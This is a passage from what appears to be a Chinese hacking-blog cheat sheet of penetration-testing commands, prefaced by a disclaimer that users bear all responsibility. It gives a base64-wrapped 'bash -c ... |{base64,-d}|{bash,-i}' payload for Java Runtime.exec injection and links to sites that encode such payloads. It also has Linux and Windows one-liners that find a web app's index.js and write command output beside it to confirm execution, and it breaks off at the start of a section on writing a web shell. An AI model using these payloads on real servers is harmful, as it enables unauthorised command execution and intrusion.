免责声明:由于传播、利用本公众号HACK之道所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号HACK之道及作者不为此承担任何责任。如有侵权烦请告知,我们会立即删除并致歉。谢谢!一、常用命令收集渗透中会用到的常用命令 。建议直接[Ctrl+F]查找java命令执行如下编码网站:https://ares-x.com/tools/runtime-exec/https://r0yanx.com/tools/java_exec_encode/https://www.bugku.net/runtime-exec-payloads/手动编码操作bash -c {echo,cGluZyAxMjcuMC4wLjE7ZWNobyAxID50ZXN0LnR4dA==}|{base64,-d}|{bash,-i}命令执行,定位资源文件写文件回显Linuxfind /|grep index.js|while read f;do sh -c "whoami" >$(dirname $f)/test.txt;doneWindows(注意盘符)for /r D:\ %i in (index.js*) do whoami > %i/../test.txt写shell在windows中,批处理需要转义字符主要有 “&”,“|”,“”等等,转义字符为”^”在Linux中,
………………………………